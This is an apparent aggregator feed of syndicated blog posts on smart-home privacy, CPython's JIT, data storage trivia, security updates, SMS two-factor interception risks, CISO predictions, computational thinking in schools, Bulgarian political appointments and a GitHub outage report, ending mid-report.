Privacy, Security, and Connected Devices: Key Takeaways From CES 2024

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2024/01/18/privacy-security-and-connected-devices-key-takeaways-from-ces-2024/

Privacy, Security, and Connected Devices: Key Takeaways From CES 2024

The topic of data privacy has become so relevant in our age of smart technology. With everything becoming connected, including our homes, workplaces, cities, and even our cars, those who develop this technology are obligated to identify consumers’ expectations for privacy and then find the best ways to meet those expectations. This of course includes determining how to best secure the data with which these technologies interact. As you can imagine, accomplishing these requirements is no easy feat.

Yes, connected technology developers have their work cut out for them, and that’s why CES 2024 included a panel to discuss this very topic: “Safeguarding Your Sanctuary: Expectations for Data Privacy in the Smart Home Era.” I had the privilege of being a part of this four-person panel, and if you weren’t in the room with us, here’s your chance to get some of the key takeaways from our discussion.

Putting the Consumer’s Needs First

What do consumers expect? The answer to this question is not black and white because individual consumers have different views of what privacy means to them. Therefore, defining a baseline that puts control of much of this data back in the hands of the consumer becomes critical.

That said, if consumers are going to have the ability to make their own data decisions then it’s important that easily understood mechanisms for managing data privacy are embedded within their smart technology. The greater technology community should also do its part to educate consumers on the overall importance of privacy and security — and the role they play in ensuring it for themselves.

Another example of putting the consumer’s needs first is when vendors have an online presence where they share details about their security and privacy policies and processes along with a point of contact so security researchers and consumers can report potential security issues within a product. The vendor’s website is also a perfect place for them to step in and play a role in educating consumers on privacy and security topics. I pointed out that if a consumer is researching product brands for purchase and a vendor has nothing to say about their privacy policies or their security program, then I typically recommend steering away from that product brand.  

The Do’s and Don’ts of Data Collection and Sharing

User data collection and sharing is a central theme in consumer privacy and data security, and our CES panel discussed this at length. Consumer opt-in for data sharing is becoming the rule rather than the exception, and our panel agreed with this practice.

One good example of data sharing in which many consumers would choose to opt in is home security vendors sharing customer data with insurance companies, thereby allowing for the consumer to potentially get a discount on their homeowner’s insurance premiums.

We also discussed data collected by the product vendor for the purpose of improving product performance and capabilities. This process should be expected, but we also pointed out that vendors should have a data retention policy and process in place that includes purging data past a certain age. For one, most data typically loses value over time as it relates to product enhancement purposes; if this data isn’t purged it could create a higher level of risk for the vendor should the data be stolen in a breach. Also, collecting and storing data that may not have any apparent business value is a risky move that vendors should avoid.

Outsmarting Connected Devices

Where do smart devices go to die… or to be reborn? The fact is, many consumers don’t always consider the serious privacy and security implications, which explains why over the last five years more than 30% of the previously used Internet of Things (IoT) devices I have purchased from Ebay for research and training purposes get delivered to me still containing consumer data, including product account passwords and WIFI pre-shared key data.

Consumers need to ensure that they do a factory reset on the devices they are disposing of. Not only that, in today’s smart home and smart car scenarios, consumers need to be extra mindful of the connected devices they’re using that will change hands. Selling your home or car means more than just turning over the keys, it means factory resetting anything that’s interacted with your personal data. Vendors can also play a role here by properly documenting the processes for factory resetting their products and also making sure those processes are easy for a consumer to perform.

[$] Improved code generation in the CPython JIT

Post Syndicated from daroc original https://lwn.net/Articles/958350/

Ken Jin from the
Faster CPython
project has been working on
taking Python’s
recently-added just-in-time (JIT) compiler
further by adding
support for a peephole optimizer
that rewrites the JIT’s intermediate representation to introduce
constant folding, type specialization, and other optimizations.
Those techniques should provide significant benefits for the
performance of many different types of code running on CPython.

Data Storage Beyond the Hardware: 4 Surprising Questions

Post Syndicated from Stephanie Doyle original https://www.backblaze.com/blog/data-storage-beyond-the-hardware-4-surprising-questions/

A decorative image showing a several types of data storage medium, like a floppy disk, a USB stick, a CD, and the cloud.

We’ve gathered you together here today to address some of weirdest questions (and answers) about everyone’s favorite topic: data storage. 

From the outside looking in, it’s easy to think it’s a subject that is as dry as Ben Stein in “Ferris Beuller’s Day Off”. But, given that everyday functions are increasingly moving to the internet, data storage is, in some ways, the secret backbone of modern society. 

Today it’s estimated that there are over 8,000 data centers (DCs) in the world, built on a variety of storage media, connected to various networks, consuming vast amounts of power, and taking up valuable real estate. Plus, the drive technology itself brings together engineering foci affected by (driving?) everything from clean room technology to DNA research. 

Fertile ground for strange, surprising questions, certainly. So, without further ado, here are some of our favorite questions about data storage. 

1. Does a Hard Drive Weigh More When It’s Full?

Short answer: for all practical purposes, no. Long answer: technically yes, but it’s such a miniscule amount that you wouldn’t be able to measure it. Shout out to David Zaslavsky for doing all the math, and here’s the summary. 

As Einstein famously hypothesized, e = mc2. If it’s been a while since you took physics, that formula defined is that energy is equal to mass multiplied by the speed of light squared. Since energy is defined by mass, then, we can infer that energy has a weight, even if it’s negligible. 

Now, hard drives record data by magnetizing a thin film of ferromagnetic material. Basically, you’re forcing the atoms in a magnetic field to align in a different direction. And, since magnetic fields have differing amounts of energy depending on whether they’re aligned or antialigned, technically the weight does change. According to David’s math, it’d be approximately 10-14 g for a 1TB hard drive. 

2. How Loud Is the Cloud?

In the past, we’ve talked about how heavy the Backblaze Storage Cloud is, and we’ve spent some ink on how loud a Backblaze DC is. All that noise comes from a combination of factors, largely cooling systems. Back in 2017, we measured our DCs at approximately 78dB, but other sources report that DCs can reach up to 96dB

When you’re talking about building your own storage, my favorite research data point was one Reddit user’s opinion:

A screenshot of a comment from Reddit user EpicEpyc that says:

I think a good rule of thumb will be "if you care about noise, don't get rackmount equipment" go a with a used workstation from your favorite brand and your ears will thank you

But, it’s still worth investing in ways to reduce the noise—if not for worker safety, then to reduce the environmental impact of DCs, including noise pollution. There are a wealth of studies out there connecting noise pollution to cardiovascular disease, hypertension, high stress levels, sleep disturbance, and good ol’ hearing loss in humans. In our animal friends, noise pollution can disrupt predator/prey detection and avoidance, echolocation, and interfere with reproduction and navigation. 

The good news is that there are technologies to keep data centers (relatively) quiet when they become disruptive to communities.  

3. How Long Does Data Stay Where You Stored It?

As much as we love old-school media here at Backblaze, we’re keeping this conversation to digital storage—so let’s chat about how long your data storage will retain your media, unplugged, in ideal environmental conditions. 

We like the way Enterprise Storage Forum put it: “Storage experts know that there are two kinds of drive in this world—those that have already failed, and those that will fail sooner or later.” Their article encompasses a pretty solid table of how long (traditional) storage media lasts.

A table that compares types of drive and how long they will last. 

Hard disk drives: 4-7 years 
Solid state drives: 5-10 years
Flash drives: 10 years average use

However, with new technologies—and their consumer applications—emerging, we might see a challenge to the data storage throne. The Institute of Physics reports that data written to a glass memory crystal could remain intact for a million years, a product they’ve dubbed the “Superman crystal.” So, look out for lasers altering the optical properties of quartz at the nanoscale. (That was just too cool not to say.)

4. What’s the Most Expensive Data Center Site?

And why? 

One thing we know from the Network Engineering team at Backblaze is that optimizing your connectivity (getting your data from point A to point B) to the strongest networks is no simple feat. Take this back to the real world: when you’re talking about what the internet truly is, you’re just connecting one computer to every other computer, and there are, in fact, cables involved

The hardware infrastructure combines with population dispersion in murky ways. We’ll go ahead and admit that’s out of scope for this article. But, working backwards from the below image, let’s just say that where there are more data centers, it’s likely there are more network exchanges. 

An infographic depicting data center concentration on a global map.
Source.

From an operational standpoint, you’d likely assume it’s a bad choice to have your data center in the middle of the most expensive real estate and power infrastructures in the world, but there are tangible benefits to joining up all those networks at a central hub and to putting them in or near population centers. We call those spaces carrier hotels

Here’s the best definition we found: 

There is no industry standard definition of a carrier hotel versus merely a data center with a meet-me room (MMR). But, generally, the term is reserved for the facilities where metro fiber carriers meet long-haul carriers—and the number of network providers numbers in the dozens.
Data Center Dynamics

Some sources go so far as to say that carrier hotels have to be in cities by definition. Either way, the result is that carrier hotels sit on some of the most expensive real estate in the world. Citing DGTL Infra from April 2023, here are the top 25 U.S. carrier hotels: 

A chart showing the top 25 carrier hotels in the United States and their locations.

Let’s take #12 on this list, the NYC listing. According to PropertyShark, it’s worth $1.15 billion. With a b. That’s before you even get to the tech inside the building. 

If you’re so inclined, flex those internet research skills and look up some of the other property values on the list. Some of them are a bit hard to find, and there are other interesting tidbits along the way. (And tell us what you find in the comments, of course.)

Bonus Question: Is It Over Already?

Look, do I want it to be over? No, never. But, the amount of weird and wonderful data storage questions that I could include in this article is infinite. Here’s a shortlist that other folks from Backblaze suggested: 

  • How broken is too broken when it comes to restoring files from a hard drive? (This is a whole article in and of itself.)
  • When I send an email, how does it get to where it goes? (Check out Backblaze CEO Gleb Budman’s Bookblaze recommendation if you’re curious.) 
  • What happens to storage drives when we’re done with them? What does recycling look like? 

So, the real question is, what do you want to know? Sound off in the comments—we’ll do our best to research and answer.

The post Data Storage Beyond the Hardware: 4 Surprising Questions appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/958676/

Security updates have been issued by CentOS (ImageMagick), Debian (chromium), Fedora (golang-x-crypto, golang-x-mod, golang-x-net, golang-x-text, gtkwave, redis, and zbar), Mageia (tinyxml), Oracle (.NET 7.0, .NET 8.0, java-1.8.0-openjdk, java-11-openjdk, python3, and sqlite), Red Hat (gstreamer-plugins-bad-free, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, and java-21-openjdk), SUSE (kernel, libqt5-qtbase, libssh, pam, rear23a, and rear27a), and Ubuntu (pam and zookeeper).

Another Attack Vector For SMS Interception

Post Syndicated from Bozho original https://techblog.bozho.net/another-attack-vector-for-sms-interception/

SMS codes for 2FAs have been discussed for a long time, and everyone knowledgeable in security knows they are not secure. What’s more – you should remove your phone number from sensitive services like Gmail, because if an attacker can fallback to SMS, the account is compromised.

Many authors have discussed how insecure SMS is, including Brian Krebbs, citing an example of NetNumber ID abuse, in addition to SIM Swap attacks and SS7 vulnerabilities.

Another aspect that I recently thought about is again related to intermediaries. Bulk SMS resellers integrate with various telecoms around the globe and accept outgoing SMS by API calls, which they then forward to a telecom in the relevant country. Global companies that send a lot of SMS try to look for cheap bulk deals (you are probably aware that Twitter/X recently decided to charge for SMS 2FA, because it was incurring high costs). These services are sometimes called a2p (application to person).

This means that intermediaries receive the 2FA code before it reaches the subscriber. A malicious insider or an attacker that compromises those intermediaries can thus have access to 2FA codes before they reach the subscriber.

I don’t know if this attack vector has been used, but it is a valid attack – if an attacker knows the intermediaries that a given service is using, they can either try to compromise the systems of the intermediaries, or gain access through a compromised insider. In either scenario, the victim’s 2FA code will be accessible to the attacker in real time.

This just reinforces the rule of thumb – don’t rely on SMS for two-factor authentication.

The post Another Attack Vector For SMS Interception appeared first on Bozho's tech blog.

How CISOs’ Roles – and Security Operations – Will Change in 2024

Post Syndicated from Jaya Baloo original https://blog.rapid7.com/2024/01/18/how-cisos-roles-and-security-operations-will-change-in-2024/

How CISOs’ Roles – and Security Operations – Will Change in 2024

It’s fair to say that 2023 was a turning point for the cybersecurity industry, and no one felt it more than the CISO. From the onslaught of ransomware and zero-day attacks, to the SEC’s new reporting rules, and added to technological innovation and sprawl, CISOs have never been under more pressure to get security right.

When you boil down a CISO’s job description to what it is we really do, predicting the unpredictable comes out at the top of the list. We must stay on top of our organization’s unique risk profile so that we can oversee the people, technologies, and processes that will keep threat actors out.

At the same time, our role at the executive level and our ability to affect change across the business is also top of mind. This is not what I or any of the fellow CISOs I speak with view as an “optional” part of our role; rather, being valued as a strategic contributor to the organization’s success is an imperative.

Without a doubt, 2024 is going to be a challenging year for those of us in the CISO role. Looking ahead, I expect the role itself to transform in several ways and, by default,  security operations will also undergo change. Read on for my top predictions of what will occur this year.

Prediction 1: CISOs will either have a seat at the table or they’ll be on the menu

For years, CISOs have been expected to do security in a vacuum regardless of what the rest of the company is doing. Irrespective of the decisions being made by the rest of the organization, the CISO is expected to figure it all out and make it secure regardless! They’re not just in charge of security, they’re in charge of potentially (bad) decision making by others around security.

Regulations such as SEC disclosure, NIS2, changes to Fedramp, and new executive orders around security mean there is more of a focus around structural-operational cadence with security in 2024. Therefore, the biggest question for most CISOs is going to be: how am I — and, indeed, how is my work — viewed by the business? The CISO is either going to be figuring out the solution with the business, or they will be an isolated person expected to figure out the solution based on a business decision that they’ve played no part in making.

Ultimately, CISOs will have a seat at the table or they will be the scapegoat when things inevitably go wrong. There is no in between. So, it’s essential that CISOs are able to demonstrate the value they provide and in a way that non-technical executives understand.

To demonstrate their value, CISOs must show how their security asks are tied to business imperatives, and the financial benefit or risk that each ask presents. Showing demonstrable improvements in security — as well as being able to easily adapt when environments change — helps executive boards see that CISOs and the security programs they develop and deploy are inherent enablers of business growth.

Prediction 2: Compliance will be top of mind for CISOs

We’re in a new era when it comes to reporting cyberattacks. CISOs are in a ‘butt-clenching’ phase trying to figure out how to comply and how to report cyber incidents when they occur. The new SEC rules make it clear that CISOs now need to think more carefully about how they talk about security and governance publicly and to regulators, when in the past they didn’t think about it by de facto.

This year, CISOs are going to be on a path of self-scrutiny. When claims are made that multi-factor authentication (MFA) is enabled across the enterprise and vulnerabilities are remediated immediately, for example, CISOs need to be checking that such actions are being done to avoid potential false claims and associated consequences.

There will be an immediate need for greater focus on compliance packs by CISOs, not just this year but over the next couple of years. Just having an ISO certification or a NIST framework doesn’t mean that operations are completely aligned.

A certification is merely a moment in time. However, CISOs need to be confident that operations are compliant beyond that piece of paper. Even the tiniest of siloes, migrations, and changes create risks such as misconfigurations, vulnerabilities, and exposures; therefore, it’s essential to have a SOC team that has complete coverage of environments and can easily adapt when environments change. CISOs also must continue to ensure they’re employing the continuous assessment and validation process that aligns with their organization’s compliance requirements.

Prediction 3: CISOs will increase their emphasis on consolidation

No one will be surprised by my saying that businesses want more bang for their buck in 2024. Every business wants simplicity, not complexity, in their security stack! Just look at third-party risk management, for example. Funnily enough, CISOs don’t want to have to manage 500 third parties; they only want to have to manage five or so.

Every time there is an incident, CISOs and their security teams need to go to each third party, figure out what they’ve been doing, and keep following up with them. This is where the tool sprawl has huge consequences. If there are 500 parties to manage, that’s a killer for overstretched and under-resourced security teams.

As CISOs, we understand that throwing more money around doesn’t solve your security problem. Implementing various point solutions within the SOC won’t end bottlenecks, inefficiencies, and negative ROI. The real value for CISOs is when the SOC team is able to do more focused tasks without costs spiraling out of control.

Therefore, CISOs will be looking to consolidate and streamline this year, allowing for better manageability, efficiency, and — ultimately — security efficacy.

The CISO Community Coming Together

While I can’t be entirely sure how my role will look at the end of the year, one thing that does make me hopeful is the wonderful network of people that I’m a part of. It’s so important for the security industry to collaborate, and the connectivity of CISOs is critical to our achieving success both professionally and on behalf of the organizations we serve.

Security is a team sport, and the security community has a unique ability to come together to solve complex challenges. I’m looking forward to knowledge sharing with my peers and the greater industry as we prepare for and adapt to innovations in artificial intelligence (AI), quantum, and other exponential technologies.

For more thoughts from the Rapid7 team on what 2024 could bring, watch the Top Cybersecurity Predictions webinar on-demand.

Integrating computational thinking into primary teaching

Post Syndicated from Veronica Cucuiat original https://www.raspberrypi.org/blog/integrating-computational-thinking-into-primary-teaching/

“Computational thinking is really about thinking, and sometimes about computing.” – Aman Yadav, Michigan State University

Young people in a coding lesson.

Computational thinking is a vital skill if you want to use a computer to solve problems that matter to you. That’s why we consider computational thinking (CT) carefully when creating learning resources here at the Raspberry Pi Foundation. However, educators are increasingly realising that CT skills don’t just apply to writing computer programs, and that CT is a fundamental approach to problem-solving that can be extended into other subject areas. To discuss how CT can be integrated beyond the computing classroom and help introduce the fundamentals of computing to primary school learners, we invited Dr Aman Yadav from Michigan State University to deliver the penultimate presentation in our seminar series on computing education for primary-aged children. 

In his presentation, Aman gave a concise tour of CT practices for teachers, and shared his findings from recent projects around how teachers perceive and integrate CT into their lessons.

Research in context

Aman began his talk by placing his team’s work within the wider context of computing education in the US. The computing education landscape Aman described is dominated by the National Science Foundation’s ambitious goal, set in 2008, to train 10,000 computer science teachers. This objective has led to various initiatives designed to support computer science education at the K–12 level. However, despite some progress, only 57% of US high schools offer foundational computer science courses, only 5.8% of students enrol in these courses, and just 31% of the enrolled students are female. As a result, Aman and his team have worked in close partnership with teachers to address questions that explore ways to more meaningfully integrate CT ideas and practices into formal education, such as:

  • What kinds of experiences do students need to learn computing concepts, to be confident to pursue computing?
  • What kinds of knowledge do teachers need to have to facilitate these learning experiences?
  • What kinds of experiences do teachers need to develop these kinds of knowledge? 

The CT4EDU project

At the primary education level, the CT4EDU project posed the question “What does computational thinking actually look like in elementary classrooms, especially in the context of maths and science classes?” This project involved collaboration with teachers, curriculum designers, and coaches to help them conceptualise and implement CT in their core instruction.

A child at a laptop

During professional development workshops using both plugged and unplugged tasks, the researchers supported educators to connect their day-to-day teaching practice to four foundational CT constructs:

  1. Debugging
  2. Abstraction
  3. Decomposition
  4. Patterns

An emerging aspect of the research team’s work has been the important relationship between vocabulary, belonging, and identity-building, with implications for equity. Actively incorporating CT vocabulary in lesson planning and classroom implementation helps students familiarise themselves with CT ideas: “If young people are using the language, they see themselves belonging in computing spaces”. 

A main finding from the study is that teachers used CT ideas to explicitly engage students in metacognitive thinking processes, and to help them be aware of their thinking as they solve problems. Rather than teachers using CT solely to introduce their students to computing, they used CT as a way to support their students in whatever they were learning. This constituted a fundamental shift in the research team’s thinking and future work, which is detailed further in a conceptual article

The Smithsonian Science for Computational Thinking project

The work conducted for the CT4EDU project guided the approach taken in the Smithsonian Science for Computational Thinking project. This project entailed the development of a curriculum for grades 3 and 5 that integrates CT into science lessons.

Teacher and young student at a laptop.

Part of the project included surveying teachers about the value they place on CT, both before and after participating in professional development workshops focused on CT. The researchers found that even before the workshops, teachers make connections between CT and the rest of the curriculum. After the workshops, an overwhelming majority agreed that CT has value (see image below). From this survey, it seems that CT ties things together for teachers in ways not possible or not achieved with other methods they’ve tried previously.  

A graph from Aman's seminar.

Despite teachers valuing the CT approach, asking them to integrate coding into their practices from the start remains a big ask (see image below). Many teachers lack knowledge or experience of coding, and they may not be curriculum designers, which means that we need to develop resources that allow teachers to integrate CT and coding in natural ways. Aman proposes that this requires a longitudinal approach, working with teachers over several years, using plugged and unplugged activities, and working closely with schools’ STEAM or specialist technology teachers where applicable to facilitate more computationally rich learning experiences in classrooms.

A graph from Aman's seminar.

Integrated computational thinking

Aman’s team is also engaged in a research project to integrate CT at middle school level for students aged 11 to 14. This project focuses on the question “What does CT look like in the context of social studies, English language, and art classrooms?”

For this project, the team conducted three Delphi studies, and consequently created learning pathways for each subject, which teachers can use to bring CT into their classrooms. The pathways specify practices and sub-practices to engage students with CT, and are available on the project website. The image below exemplifies the CT integration pathways developed for the arts subject, where the relationship between art and data is explored from both directions: by using CT and data to understand and create art, and using art and artistic principles to represent and communicate data. 

Computational thinking in the primary classroom

Aman’s work highlights the broad value of CT in education. However, to meaningfully integrate CT into the classroom, Aman suggests that we have to take a longitudinal view of the time and methods required to build teachers’ understanding and confidence with the fundamentals of CT, in a way that is aligned with their values and objectives. Aman argues that CT is really about thinking, and sometimes about computing, to support disciplinary learning in primary classrooms. Therefore, rather than focusing on integrating coding into the classroom, he proposes that we should instead talk about using CT practices as the building blocks that provide the foundation for incorporating computationally rich experiences in the classroom. 

Watch the recording of Aman’s presentation:

You can access Aman’s seminar slides as well.

You can find out more about connecting research to practice for primary computing education by watching the recordings of the other seminars in our series on primary (K–5) teaching and learning. In particular, Bobby Whyte discusses similar concepts to Aman in his talk on integrating primary computing and literacy through multimodal storytelling

Sign up for our seminars

Our 2024 seminar series is on the theme of teaching programming, with or without AI. In this series, we explore the latest research on how teachers can best support school-age learners to develop their programming skills.

On 13 February, we’ll hear from Majeed Kazemi (University of Toronto) about his work investigating whether AI code generator tools can support K-12 students to learn Python programming.

Sign up now to join the seminar:

The post Integrating computational thinking into primary teaching appeared first on Raspberry Pi Foundation.

Canadian Citizen Gets Phone Back from Police

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/01/canadian-citizen-gets-phone-back-from-police.html

After 175 million failed password guesses, a judge rules that the Canadian police must return a suspect’s phone.

[Judge] Carter said the investigation can continue without the phones, and he noted that Ottawa police have made a formal request to obtain more data from Google.

“This strikes me as a potentially more fruitful avenue of investigation than using brute force to enter the phones,” he said.

Десантът на партийните лейтенанти

Post Syndicated from Емилия Милчева original https://www.toest.bg/desantut-na-partiynite-leytenanti/

Десантът на партийните лейтенанти

С доказана биография в системата на националната сигурност. Притежава високи професионални и нравствени качества. 

Това е цитат от предложението, с което през ноември 2018 г. ДПС номинира Илко Желязков, кадър на бившата ДС, за заместник-председател на Националното бюро за контрол на специалните разузнавателни средства. Желязков е известен като „лейтенантът на Пеевски“ и по-късно заедно с боса си е санкциониран по Глобалния закон „Магнитски“. 

Ето какво пише в мотивите на Министерството на финансите на САЩ за наложените санкции:

Пеевски използвал Желязков за осъществяването на схема за подкупи, засягаща български документи за пребиваване за чуждестранни граждани, както и за подкупването на държавни служители чрез различни средства, в замяна на информация и лоялност от тяхна страна.

Още от същото

Защо припомняме всичко това? Защото сега започват да се появяват напеви по същите мотиви – през 2024-та предстои парламентът да избере около 80 души в 17 регулатора и различни структури (съдебни кадровици, Антикорупционна комисия и др.). Десантът на партийни лейтенанти започна с номинациите за съдии в Конституционния съд (КС) и конкретно с номинацията на председателката на парламентарната група на ГЕРБ Десислава Атанасова. 

Конституцията дефинира изискванията към съдиите в КС – с 15-годишен юридически стаж и високи професионални и нравствени качества, като органът, който прави избора, носи и отговорността. (КС се състои от 12 конституционни съдии, 1/3 от които се избират от Народното събрание, 1/3 се назначават от президента на републиката и 1/3 се избират на общо събрание на съдиите от Върховния административен съд и Върховния касационен съд.) След като номинациите са на парламента, то моралът и професионализмът се равняват по нивото на парламентаристите.

Ако се вземе средноаритметичната стойност за тези качества в 49-тото НС, показателят не ще да е висок. Следователно Атанасова с лекота прескача ниската летва. И не само нея, но и изискването за 15 години стаж, за което се зачитат годините ѝ като юрисконсулт на общинска болница и парламентарният ѝ опит.

Проблемът е по-голям от очевадната непригодност и обидното приравняване на политически към юридически опит от лидера на ГЕРБ Борисов и от самата Атанасова. В КС има и други съдии, които дължат креслото си на политическо лоби, но те имат академичен опит. За Десислава Атанасова проблемът дори не е в дипломата по право от УНСС и в коментара пред „Сега“ на депутата от ПП–ДБ Бойко Рашков, който е и хабилитиран преподавател в университета.

Ние не сме много доволни от нейното представяне като студент, така да се изразя. Струва ми се, че тя е учила задочно.

Неизвестни обстоятелства може да са попречили на Атанасова да е блестяща студентка, а и Рашков все повече страни от парламентарната си група и критикува действията на колегите си. Но фалстартът дори не е в дипломата и в скромния опит. Фактът, че в обществото Атанасова е известна единствено и само като политическо лице, партиен бюрократ, и то в авторитарна партия като ГЕРБ, означава, че в нея ще сработва създаденият през 15-те години във въпросната партия условен рефлекс за лоялност и подчинение на Вожда. Не и в служба на Конституцията, гарантираща свободите и равенството на гражданите „по достойнство и права“. Достатъчно е да се споменат „тефтерчето на Златанов“ и записките кого да опраска, избирателният натиск от Българската агенция по безопасност на храните, невидимият за Комисията за защита на конкуренцията слон на пазара на горива – „Лукойл“… Списъкът е дълъг. 

Звездата на Атанасова в партията изгря не в първия кабинет на ГЕРБ, където за кратко беше министър на здравеопазването без значима диря, а в последните няколко парламента, в които се заостри като политик. Тя не е известна като речовит парламентарист, нито като авторитетен законотворец, но не само нейна е отговорността за качеството на законодателството в този парламент, прочул се с ремонт на ремонта на закон. 

Но въпреки това под предложението за нейната кандидатура, както и на номинирания от ПП–ДБ пенсиониран върховен съдия Борислав Белазелков са се подписали всички лидери на управляващата коалиция (именно коалиция, макар и без коалиционно споразумение). Бойко Борисов, лидерите на ДБ и ПП Христо Иванов, Атанас Атанасов и Кирил Петков, и разбира се, председателят на ПГ на ДПС Делян Пеевски – всички са съгласни, че Атанасова притежава високи професионални и нравствени качества, за да бъде съдия в Конституционния съд. (Бойко Борисов прекратява кариерата ѝ в политиката с достойно и добре заплатено оттегляне – „Тоест“ още през декември писа, че тя е от недоволните от лидера. Но дори не стигна до опит за свалянето му.)

Така още преди да е минало гласуването в пленарната зала, трите формации са подпечатали съгласието си, че Атанасова и Белазелков ще са новите конституционни съдии. Никой не коментира кандидата на другия и ще гласува безропотно. Това поведение вреди на имиджа на ПП–ДБ, особено на „Демократична България“, тъй като в очите на обществото те изглеждат като опортюнисти, готови на безпринципни компромиси, за да получат своя дял назначения, и така да гарантират интересите на бизнесите и лобитата зад тях.

Между ценностите и прагматизма

Какво толкова – нали в КС ще има кой да редактира решенията. Така е. Атанасова ще трябва да се справи с първоначалното писане в случаите, в които ще е съдия-докладчик. Няма как да ги избегне. Но има и друг проблем, който в случая с Атанасова може да се определи и като „политическа целесъобразност“. Още в първото от поредица серийни назначения коалицията ПП–ДБ загърби уверенията за висок професионализъм, интегритет и обществено доверие при кадровото обновление, най-мащабното от управлението на Иван Костов и СДС насам. Какво да се прави, политиката е изкуство на възможното, сиреч е безнравствена по същността си, тъй като прагматизмът надделява над идеите и идеалите.

Възможно ли е друго „възможно“? Например Кирил Петков да хване Борисов за гушата и да му кресне, че ще разкрие корупция за милиарди от управлението на ГЕРБ, ако не оттегли свой кандидат. Или Христо Иванов да отхвърли номинация на Пеевски заради липса на интегритет… Изобщо да ораторстват пламенно, както го правеха на площада, и да се кълнат, че ще накажат корумпираните, защото сега са ги прегърнали като неизбежно зло. В такъв случай няма никакво значение колко ще са високи критериите за избop нa члeнoвe нa Bиcшия съдебен съвет, на шестимата прокурори от парламентарната квота във Висшия прокурорски съвет, на cъдeбнитe инcпeĸтopи, на членове на Комисията за защита на конкуренцията, на Комисията за финансов надзор и т.н., и т.н., след като е налице мнозинство от 160 гласа, което ще избере всеки посочен.

Мнозинството от две трети, или 160 гласа, за избор на членове на регулатори, с каквото разполагат трите формации ПП–ДБ, ГЕРБ–СДС и ДПС, вече е включено и в Конституцията. 

„Има грешка, има и прошка“

Гласуват и прощават, и пак гласуват, и пак прощават. Тези сюжетни линии ще следва управляващата коалиция-без-коалиционно-споразумение в следващите месеци. Така както (о)простиха на министъра на вътрешните работи Калин Стоянов полицейската жестокост по време на протестите на футболните фенове срещу действия на БФС. Има грешка, има и прошка, каза по този повод съпредседателят на „Демократична България“ Атанас Атанасов. Политическа прошка в стил „Тихо, да не ядосаме Пеевски“, както я нарече „Капитал“. Достойно за памфлет, но минава за политически компромис. 

А само преди малко повече от две години по повод затриването на „Булгартабак“ Христо Иванов беше обявил как ченгетата и корумпарите от Сарая са унищожили предприятието. 

Това е моделът „ДПС“. Това е плячкосването. Това е духът на унищожението на Пеевски и Сарая. 

Да не би сега и той като Даниел Лорер от ПП да вярва, че Пеевски и ДПС се променят за добро?! Наивността е присъща не на политиците, а на избирателите.

И тъкмо когато никой не говореше за корупция…

Към гласуването и прошката (не за всички) се прибавя обаче и игнорирането на неудобни разкрития, като на BIRD.bg за имотните сделки на министъра на финансите Асен Василев и на Лорер. След като американски гражданин предявява иск за малко над 5 млн. лв. към „СТВ Консълтинг“ на Василев, която той периодично напуска, щом влезе в политиката, фирмата и Лорер продават сграда в центъра на София на „Интелигентни трафик системи“ (ИТС) и нейната собственичка Светослава Арнаудова. Това дружество няколко години има господстващо положение на пазара на винетки и получава комисиона от 7% от всяка продадена винетка. 

Апартаментът на Лорер в сградата е купен за 1 млн. евро, останалата част от триетажната постройка, земята, гаражи и фитнес – за близо 1,5 млн. евро. В публикацията „5 неудобни въпроса за имотния скандал около Асен Василев и Даниел Лорер“ от „Сега“ отбелязват факта, че продажната цена на имота на Лорер излиза „7940 лв. на квадрат – тоест, той получава за своя имот много повече, при условие че даже не е платил за направения преди това от фирмата на Асен Василев ремонт“.

На бял свят обаче се появява нова интересна информация – два месеца преди продажбата на имотите Министерството на финансите публикува за обществено обсъждане промени в Закона за обществените поръчки (ЗОП), които предвиждат отпадане на съществуващото изключение АПИ да сключва договори с фирмите за електронно пътно таксуване, без да провежда процедури по реда на ЗОП. ИТС не е съгласна и в становището, което представя, настоява промяната да отпадне. Което и става. Така „Интелигентни трафик системи“ и другите фирми като нея запазват привилегированото си положение.

До момента, освен в изявления във Facebook, и Василев, и Лорер, и Арнаудова избягват всякакви коментари. Депутатът от ПП коментира в четвъртък, 18 януари, казуса с имота си с обширен пост в социалната мрежа, уверявайки, че е купил и продал на пазарни цени. Министерството на финансите също публикува на сайта си становище, с което определя като „некоректни медийните твърдения, според които през юни 2023 г. МФ е приело промени в Закона за обществените поръчки под влияние на външно становище“.

Министърът на финансите е заявил, че ще коментира, след като приключи проверката на прокуратурата, сезирана за случая от Гражданско сдружение БОЕЦ. Но тъй като наблюдаващият прокурор сметнал, че от сигнала не може да се стигне до извода има ли извършени финансови престъпления, възложил проверка в следващите три месеца на Комисията за противодействие на корупцията, съобщи bTV. Това е новото звено, което разследва лица, заемащи публични държавни длъжности. Но неговото ново ръководство трябваше да се избере до 6 януари тази година. Парламентът не се е заел още със задачата да избере тримата, които да я ръководят, а един от тях ще бъде и неин председател на ротационен принцип. Според „Капитал“ това ще стане до два месеца.

Не бива да се възлагат големи надежди на работата на тези органи, тъй като след отстраняването на Иван Гешев от поста главен прокурор прокуратурата активно „обезпаразитява“ от разследвания видни фигури от управляващото мнозинство, като Борисов например. Eдва ли ще допусне да се развали т.нар. сглобка, като пострада един от влиятелните политици в нея – Асен Василев. От ГЕРБ, а и от ДПС са склонни да поемат и поста вицепремиер след ротацията през март, когато Мария Габриел ще стане министър-председател на кабинет с първия мандат на ГЕРБ. 

Започва десантът на партийните лейтенанти. 
Пък ако има нещо – няма нищо*.


* Характерен израз след ходене на гости по соцвремената, омиротворяващ гости и домакини, ако е имало караници.

GitHub Availability Report: December 2023

Post Syndicated from Jakub Oleksy original https://github.blog/2024-01-17-github-availability-report-december-2023/

In December, we experienced three incidents that resulted in degraded performance across GitHub services. All three are related to a broad secret rotation initiative in late December. While we have investigated and identified improvements from each of these individual incidents, we are also reviewing broader opportunities to reduce availability risk in our broader secrets management.

December 27 02:30 UTC (lasting 90 minutes)

While rotating HMAC secrets between GitHub’s frontend service and an internal service, we triggered a bug in how we fetch keys from Azure Key Vault. API calls between the two services started failing when we disabled a key in Key Vault while rolling back a rotation in response to an alert.

